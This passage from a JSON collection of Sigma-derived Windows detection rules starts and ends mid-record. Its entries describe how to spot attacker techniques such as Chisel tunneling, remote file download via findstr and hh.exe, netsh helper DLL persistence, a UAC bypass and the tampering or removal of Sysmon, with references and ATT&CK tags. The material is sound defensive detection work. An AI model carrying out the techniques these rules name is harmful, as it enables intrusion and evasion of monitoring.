"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/jpillora/chisel/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "value": "PUA - Chisel Tunneling Tool Execution" }, { "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", "meta": { "author": "frack113", "creation_date": "2021-12-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", "value": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE" }, { "description": "Detects execution of arbitrary DLLs or unsigned code via a \".csproj\" files via Dotnet.EXE.", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Legitimate administrator usage" ], "filename": "proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", "https://twitter.com/_felamos/status/1204705548668555264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "value": "Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE" }, { "description": "Detects execution of \"findstr\" with specific flags and a remote share path. This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.\n", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "587254ee-a24b-4335-b3cd-065c0f1f4baa", "value": "Remote File Download Via Findstr.EXE" }, { "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", "meta": { "author": "Konstantin Grishchenko, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", "value": "Suspicious Rundll32 Setupapi.dll Activity" }, { "description": "Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-07-13", "falsepositive": [ "Administrator typo might cause some false positives" ], "filename": "proc_creation_win_regsvr32_flags_anomaly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "value": "Potential Regsvr32 Commandline Flag Anomaly" }, { "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "value": "Remote CHM File Download/Execution Via HH.EXE" }, { "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wsl_child_processes_anomalies.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2267fe65-0681-42ad-9a6d-46553d3f3480", "value": "WSL Child Process Anomaly" }, { "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", "meta": { "author": "Sreeman", "creation_date": "2020-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1543.003", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", "value": "Potential Persistence Attempt Via Existing Service Tampering" }, { "description": "load malicious registered COM objects", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_rundll32_registered_com_objects.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", "value": "Rundll32 Registered COM Objects" }, { "description": "Detects the execution of a renamed ProcDump executable.\nThis often done by attackers or malware in order to evade defensive mechanisms.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-11-18", "falsepositive": [ "Procdump illegally bundled with legitimate software.", "Administrators who rename binaries (should be investigated)." ], "filename": "proc_creation_win_renamed_sysinternals_procdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "value": "Renamed ProcDump Execution" }, { "description": "Detects the execution of \"hh.exe\" to open \".chm\" files.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "False positives are expected with legitimate \".CHM\"" ], "filename": "proc_creation_win_hh_chm_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "value": "HH.EXE Execution" }, { "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-09", "falsepositive": [ "Legitimate administrators might use this command to update Sysmon configuration." ], "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87911521-7098-470b-a459-9a57fc80bdfd", "value": "Sysmon Configuration Update" }, { "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "value": "Audit Policy Tampering Via NT Resource Kit Auditpol" }, { "description": "Detects the creation of a new service using the \"sc.exe\" utility.", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2023-02-20", "falsepositive": [ "Legitimate administrator or user creates a service for legitimate reasons.", "Software installation" ], "filename": "proc_creation_win_sc_create_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_create_service.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85ff530b-261d-48c6-a441-facaa2e81e48", "value": "New Service Creation Using Sc.EXE" }, { "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-07", "falsepositive": [ "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "filename": "proc_creation_win_susp_archiver_iso_phishing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://twitter.com/1ZRR4H/status/1534259727059787783", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml" ], "tags": [ "attack.initial-access", "attack.t1566" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "value": "Phishing Pattern ISO in Archive" }, { "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "creation_date": "2022-10-10", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_pchunter.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://web.archive.org/web/20231210115125/http://www.xuetr.com/", "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1082", "attack.t1057", "attack.t1012", "attack.t1083", "attack.t1007" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", "value": "HackTool - PCHunter Execution" }, { "description": "Detects when an admin share is mounted using net.exe", "meta": { "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "creation_date": "2020-10-05", "falsepositive": [ "Administrators" ], "filename": "proc_creation_win_net_use_mount_admin_share.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", "value": "Windows Admin Share Mount Via Net.EXE" }, { "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2023-02-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_autohotkey.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/", "https://www.autohotkey.com/download/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "value": "Renamed AutoHotkey.EXE Execution" }, { "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "value": "Uninstall Sysinternals Sysmon" }, { "description": "Detect suspicious parent processes of well-known Windows processes", "meta": { "author": "vburov", "creation_date": "2019-02-23", "falsepositive": [ "Some security products seem to spawn these" ], "filename": "proc_creation_win_susp_proc_wrong_parent.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96036718-71cc-4027-a538-d1587e0006a7", "value": "Windows Processes Suspicious Parent Directory" }, { "description": "Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Legitimate usage for tracing and diagnostics purposes" ], "filename": "proc_creation_win_vsdiagnostics_execution_proxy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0xBoku/status/1679200664013135872", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac1c92b4-ac81-405a-9978-4604d78cc47e", "value": "Potential Binary Proxy Execution Via VSDiagnostics.EXE" }, { "description": "Detects new process creation using WMIC via the \"process call create\" flag", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_process_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process", "https://www.sans.org/blog/wmic-for-incident-response/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", "value": "New Process Created Via Wmic.EXE" }, { "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.\n", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_helper_dll_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/", "https://github.com/outflanknl/NetshHelperBeacon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.007", "attack.s0108" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56321594-9087-49d9-bf10-524fe8479452", "value": "Potential Persistence Via Netsh Helper DLL" }, { "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-02-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_calc_uncommon_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ItsReallyNick/status/1094080242686312448", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "value": "Suspicious Calculator Usage" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "value": "UAC Bypass Using MSConfig Token Modification - Process" }, { "description": "Detects execution of powershell scripts via Runscripthelper.exe", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_runscripthelper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "value": "Suspicious Runscripthelper.exe" }, { "description": "Detects execution of PktMon, a tool that captures network packets.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pktmon_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pktmon_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "value": "PktMon.EXE Execution" }, { "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", "meta": { "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "creation_date": "2021-12-17", "falsepositive": [ 